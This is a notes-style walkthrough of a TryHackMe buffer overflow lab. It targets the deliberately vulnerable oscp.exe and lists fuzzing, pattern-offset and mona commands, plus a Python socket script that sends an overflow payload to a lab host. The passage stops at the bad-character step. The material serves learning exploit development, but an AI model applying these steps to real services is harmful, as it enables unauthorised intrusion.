This is a write-up for Buffer Overflow Prep room by Tib3rius on Try Hack Me in notes style format.
Useful Links
=======
⇒ https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst
⇒ https://tryhackme.com/room/bufferoverflowprep
Fuzzing with long input Strings
==================
⇒ python3 -c ‘print (“A” * 5000)’ ⇒ Generate lots of As
⇒ Run oscp.exe in Immunity Debugger on the target
⇒ Connect with netcat and send these A’s to target : OVERFLOW1 AAAA….5000 times
⇒ OSCP.exe crashes indicated we can exploit this using Buffer Overflow.
MSF Pattern create
===========
⇒ msf-pattern_create -l 5000
⇒ send over to the target exe via nc session only.
Mona Config
========
⇒ !mona config -set workingfolder c:\mona\%p ⇒ Run this in Immunity
Finding Offset
========
⇒ In Immunity Debugger note the EIP after sending the pattern and crashing the exe.
⇒ msf-pattern_offset -l 5000 -q 6F43396E <====EIP
Offset is at 1978.
⇒ Fuzz again with 1978 A’s and 4 B’s
* python3 -c ‘print (“A” * 1978 + “B” * 4)’
- So we see EIP is filled with four B’s. We found the exact sweet spot.
⇒ Python 3 script to test the same:
import socketimport sys
message = b"OVERFLOW1 " #Notice the space in the end
payload = message + b"A" * 1978 + b"B" * 4
try:
print("Sending payload...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.194.7',1337))
s.recv(1024)
s.send(payload + b'\r\n')
s.recv(1024)
s.close
except:
print("Cannot connect to server")
sys.exit()
Finding Bad Characters
=============
⇒ !mona bytearray -b “\x00” ⇒ Run this in Immunity to generate…